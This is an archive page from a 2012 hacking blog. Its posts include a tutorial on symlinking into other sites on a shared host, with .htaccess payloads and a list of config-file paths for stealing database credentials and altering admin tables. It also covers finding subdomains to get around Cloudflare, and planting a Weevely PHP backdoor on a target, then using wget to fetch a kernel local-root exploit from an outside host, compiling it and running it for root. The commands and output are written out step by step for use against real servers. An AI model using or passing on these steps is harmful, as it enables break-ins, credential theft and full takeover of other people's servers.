Showing posts with label Linux Exploitation. Show all posts
Showing posts with label Linux Exploitation. Show all posts

Tuesday, 25 September 2012

How To Get All Subdomains Of A Website and Bypass Cloudflare Protection

Posted By: Security Geeks on 00:07
Hello guys :)
Today I have a new video tutorial for you :)
I will show you how to get all the subdomains of a target, with their IP's which will allow us to bypass cloudflare protection sometimes :)
Hope you enjoy this video :)



Best Played In Full Screen Mode!
Btw, I mean "server names" not "hostnames" in USA.gov test :P
Read More


Tuesday, 14 August 2012

Symlink Tutorial

Posted By: Security Geeks on 13:39




Hello Guys, Today I'm going to explain how to symlink websites in two different methods.
So Lets Start!

[#] Explanation
First I will explain what symlink can do, Symlinking is making Symbolic links to other websites on the same server to read their configuration files, connect to their database, and get the information needed to get access to their Control panel.
and that's about it :)



[#] Method #1

After uploading you shell on the server make a directory with the command bellow:

mkdir sym


NOTE:- The directory can be called whatever you want, just change the "sym" to any name.

Enter your new directory then upload OR create a file called ".htaccess" in the new directory with the code bellow inside it:


Options all
DirectoryIndex Sux.html
AddType text/plain .php
AddHandler server-parsed .php AddType text/plain .html
AddHandler txt .html
Require None
Satisfy Any
Like this picture:

After that, we will run the command bellow to create a symlink to "/" directory:
ln -s / root
and it will look like this:


And if we opened the directory "sym" from our browser like "www.website.com/sym"
it should look like this:
in the image above my shell was in /downloads so I made "sym" directory inside /downloads

and our process is almost done, now we just have to get the user of the target website.
I've provided user.php code in the bottom of the post, this script will give you all the websites on the server and their username.

when you get the username of your target, just open the link like this:

www.website.com/sym/root/home/(user)/public_html
where (user) = the user of the target
here is a picture for example:

where the user was "hillock"

now the next step is easy, we will start looking for the configuration its usually called config.php, or configuration.php.
here are the location of configuration files in the most famous webapps out there.


vBulletin -- /includes/config.php
IPB -- /conf_global.php
MyBB -- /inc/config.php
Phpbb -- /config.php
Php Nuke -- /config.php
Php-Fusion -- config.php
SMF -- /Settings.php
Joomla -- configuration.php , configuration.php-dist
WordPress -- /wp-config.php
Drupal -- /sites/default/settings.php
Oscommerce -- /includes/configure.php
e107 -- /e107_config.php
Seditio -- /datas/config.php


when you find the configuration file, it will contain the database details.
it will look like the image bellow (image bellow is joomla configuration file):

now upload SQL.php (code provided bellow)
and connect to the database.
Congrats :) now you can get all the details from admin table, and even change it.

[#] Method #2

In this method, we wont symlink the root directory, we will symlink the target's public_html dir directly.
To do this, just follow those steps,
1. Make the a new directory, just like method 1
2. make ".htaccess" OR upload it with the code bellow:

Options Indexes FollowSymlinks
DirectoryIndex z0mbie.htm
AddType txt .php
AddHandler txt .php

3. run the following comman:

ln -s /home/(user)/public_html (user)

where (user) = the target's user
and it will look like this when we open it in our browser:
in the picture the user name of my target was "csseipsn"
now you just have to find the configuration and connect :)
Scripts Needed:

User.php Source Code
SQL.php Source Code

FOR EDUCATIONAL PURPOSE ONLY!
Read More


Monday, 13 August 2012

How To Connect To A Server Via Weevely Backdoor

Posted By: Security Geeks on 11:38





Hello Guys,
today I have another video for you on how to connect to a server via weevely!

weevely is a PHP backdoor.
and from this tutorial you can get better understanding about my R00ting with weevely Tutorial :)

so here is the video, hope you like it!




           
Best Played In Full Screen Mode!

Enjoy :)
Read More


Friday, 10 August 2012

Rooting A Server With Weevely

Posted By: Security Geeks on 16:45




Hello again guyz,

today I'm going to show you how to R00t a server with Weevely in BackTrack.
First of all open Weevely:
Menu > BacTrack > Maintaining Access > Web Backdoors > Weevely
Or
Open Terminal and type:
root@root: cd /pentest/backdoor/web/weevely

############################################################



Now lets make our backdoor by typing:
root@root:./main.py -g -o /root/Desktop/backdoor.php -p password
 by typing this command, we made a backdoor called 'backdoor.php' with the password: 'password'

++++++++++++++++++++++Commands We Need++++++++++++++++++++++++++
-g  = Generate backdoor
-o  = Output
-p  = Password
-u  = URL
-t  = start Terminal session
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Steps:


Uploading our backdoor & connecting to it.
Checking the Kernel & Finding LocalR00t for it.
Compiling The LocalR00t
Executing..
###########################################################################
Lets start:


Open your shell and upload the backdoor:

The link to the backdoor will be the same as shell: For Example:
www.target.com/uploads/shell.php           <== shell
www.target.com/uploads/backdoor.php   <== backdoor

Connect to the backdoor by typing:
 ./main.py -t -u http://www.target.com/uploads/backdoor.php -p password

root@root:/pentest/backdoors/web/weevely# ./main.py -t -u http://www.target.com/backdoor.php -p password
  Weevely 0.3 - Generate and manage stealth PHP backdoors.
  Copyright (c) 2011-2012 Weevely Developers
  Website: http://code.google.com/p/weevely/

+ Using method 'system()'.
+ Retrieving terminal basic environment variables .

[hacker@target.com/]
Now to find the kernel version type:
uname -a
[hacker@target.com/] uname -a
2.6.18 (example)

 Now we have to find the localroot for that kernel in :
www.1337day.com
www.exploit-db.com
www.google.com
and some others..

Now, we go to the directory /tmp/, coz its always writeable,
now lets say the kernel was 2.6.18
there are some ways to get the localroot:
uploading through shell
wget method
curl
Now let me explain how each method works:

ofcourse you know how to upload though the shell :P

wget
wget www.exploit.com/2.6.18.c
curl
curl www.exploit.com/2.6.18.c -o new_name

for this TUT we will use WGET


############################################


[hacker@target.com/tmp/]ls
file
file1
anything
[hacker@target.com/tmp/]wget www.exploit.com/2.6.18.c
--2012-01-29 05:43:37--  http://1337day.com/exploits/17158
Resolving exploitcom... 127.1.1
Connecting to exploit.com|127.1.1|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/html]
Saving to: `2.6.18.c'

     0K .........                                               208M=0s

2012-01-29 05:43:38 (208 MB/s) - `2.6.18.c' saved [9396]
 [hacker@target.com/tmp/]ls
 2.6.18.c
 file
 file1
 anything
#############################################
ok, now the exploit is on the server, we have to compile it by this command:
gcc 2.6.18.c -o zombie
[hacker@target.com/tmp/]gcc 2.6.18.c -o zombie


[hacker@target.com/tmp/]ls
 2.6.18.c
 file
 file1
 anything
 zombie

++++++++++++++++
chmod 777 zombie
++++++++++++++++
[hacker@target.com/tmp/]chmod 777 zombie

++++++++++++++++
executing..
++++++++++++++++

[hacker@target.com/tmp/]./zombie
.
.
.
.
.
done!
[hacker@target.com/tmp/]id
uid=(root) gid=(root)

R00ted!

FOR EDUCATIONAL PURPOSE ONLY
Read More


Subscribe to: Posts (Atom)